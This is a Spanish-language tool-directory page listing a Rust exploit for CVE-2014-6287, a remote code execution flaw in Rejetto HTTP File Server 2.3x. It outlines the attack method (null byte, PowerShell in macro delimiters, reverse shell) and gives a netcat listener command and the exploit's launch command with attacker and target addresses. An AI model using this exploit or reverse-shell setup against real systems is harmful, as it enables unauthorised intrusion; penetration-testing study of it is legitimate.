Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2014-6287 — Una implementación en Rust del exploit CVE-2014-6287 dirigido a Rejetto HTTP File Server (HFS) versiones 2.3x anteriores a 2.3c. | Kitploit
Herramientas/GitHubGitHub/nika0x38/cve-2014-6287
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubnika0x38/cve-2014-6287

CVE-2014-6287

Una implementación en Rust del exploit CVE-2014-6287 dirigido a Rejetto HTTP File Server (HFS) versiones 2.3x anteriores a 2.3c.

Ver Repositorio
1hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2014-6287 - Exploit RCE para Rejetto HTTP File Server

Rust Security

Una implementación en Rust del exploit CVE-2014-6287 dirigido a Rejetto HTTP File Server (HFS) versiones 2.3x anteriores a 2.3c.

Resumen de la Vulnerabilidad

CVE-2014-6287 es una vulnerabilidad crítica de ejecución remota de código en Rejetto HTTP File Server (HFS).

Detalles Técnicos

  • Software Afectado: Rejetto HTTP File Server (HFS) 2.3x anterior a 2.3c
  • Tipo de Vulnerabilidad: Ejecución Remota de Código (RCE)
  • Puntuación CVSS: 10.0 (Crítica)
  • CWE: CWE-94 (Control Inadecuado de la Generación de Código)

Descripción

La función findMacroMarker en en Rejetto HTTP File Server permite a atacantes remotos ejecutar programas arbitrarios mediante una secuencia en una acción de búsqueda. Esto permite a los atacantes eludir la validación de entrada e inyectar código malicioso que se ejecuta en el sistema objetivo.

parserLib.pas
%00

El exploit funciona de la siguiente manera:

  1. Creando una consulta de búsqueda maliciosa que contiene un byte nulo (%00)
  2. Inyectando comandos de PowerShell dentro de los delimitadores de macro {. y .}
  3. El servidor procesa la macro y ejecuta el código de PowerShell incrustado
  4. Estableciendo una conexión de shell inversa de vuelta al atacante

Uso

Paso 1: Configurar un Listener de Netcat

Antes de ejecutar el exploit, configure un listener en su máquina atacante para capturar la shell inversa:

root@kitploit:~
# Reemplace <LPORT> con su puerto de escucha deseado
nc -lvnp <LPORT>

Paso 2: Ejecutar el Exploit

root@kitploit:~
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]

Parámetros Requeridos:

  • -l, --lhost <LHOST>: Su dirección IP local (máquina atacante)
  • -p, --lport <LPORT>: Su puerto local para la shell inversa
  • -r, --rhost <RHOST>: Dirección IP del objetivo (servidor HFS vulnerable)

Parámetros Opcionales:

  • -t, --rport <RPORT>: Puerto del objetivo (por defecto: 80)

Descargo de Responsabilidad

Esta herramienta es solo para fines educativos y de pruebas de penetración autorizadas. Úsela de manera responsable y solo en sistemas que posea o para los que tenga permiso explícito

Descargar herramienta